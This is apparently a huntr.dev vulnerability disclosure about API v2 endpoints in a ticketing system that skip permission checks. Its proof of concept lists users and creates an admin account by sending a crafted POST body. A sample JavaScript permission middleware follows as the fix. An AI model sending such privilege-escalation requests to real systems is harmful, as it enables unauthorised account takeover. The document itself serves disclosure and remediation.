huntr Tienpa99 74A252A2-8BF6-4F88-A180-B90338A239FA
History: May 12, 2022 - 3:10 p.m.

Improper Privilege Management API V2

2022-05-12 15:10:47
tienpa99
www.huntr.dev

EPSS

0.001

Percentile

41.1%

Description

Some API v2 endpoints do not check permissions, allowing attackers to retrieve or edit information about tickets, accounts, groups, departments, teams, and ElasticSearch.

Proof of Concept

Get users list

1. Log in.
2. Go to `/api/v2/accounts?type=all`.
3. The user list is returned.


Create user with admin role

1. Get the admin role id in `/api/v2/accounts`.
2. Send a POST request to `/api/v2/accounts` with this body:

```json
{"username":"test21233","fullname":"test21233","title":"test2","email":"[email protected]","teams":["627ce1fd9f59377095600ce9"],"role":"627ce1fd9f59377095600ce1","password":"test2test2","passwordConfirm":"test2test2"}
```

3. The account is created successfully.

Note

Many API endpoints are vulnerable; I just show a piece of the attack vector that can happen.
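
Both requests above succeed because the API answers any logged-in caller. As an added example (not code from the affected project), the JavaScript below sketches deny-by-default permission middleware plus a role-ceiling check on account creation. The role table, permission names, and the `dispatch` stand-in for Express-style routing are assumptions constructed for illustration.

```javascript
// Constructed role table (assumption). A Map avoids prototype-key lookups
// such as "constructor" being treated as a valid role.
const ROLES = new Map([
  ['admin',   { level: 3, grants: ['accounts:view', 'accounts:create'] }],
  ['manager', { level: 2, grants: ['accounts:view', 'accounts:create'] }],
  ['user',    { level: 1, grants: [] }],
]);

// Middleware factory: reject unless the caller's role grants `permission`.
function requirePermission(permission) {
  return (req, res, next) => {
    const role = ROLES.get(req.user && req.user.role);
    if (!role) return res.status(401).json({ error: 'not authenticated' });
    if (!role.grants.includes(permission)) {
      return res.status(403).json({ error: 'forbidden' });
    }
    next();
  };
}

// Handler: a permitted caller still may not assign a role above their own.
function createAccount(req, res) {
  const caller = ROLES.get(req.user.role);
  const target = ROLES.get(req.body.role);
  if (!target) return res.status(400).json({ error: 'unknown role' });
  if (target.level > caller.level) {
    return res.status(403).json({ error: 'cannot assign higher role' });
  }
  return res.status(201).json({ username: req.body.username, role: req.body.role });
}

// Minimal stand-in for Express dispatch so the example runs offline.
function dispatch(chain, req) {
  const res = {
    code: 200, body: null,
    status(c) { this.code = c; return this; },
    json(b) { this.body = b; return this; },
  };
  let i = 0;
  const next = () => { if (i < chain.length) chain[i++](req, res, next); };
  next();
  return res;
}

// Route chains: the permission check runs before every handler.
const listAccounts = [requirePermission('accounts:view'),
  (req, res) => res.json({ accounts: [] })];
const postAccount = [requirePermission('accounts:create'), createAccount];
```
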
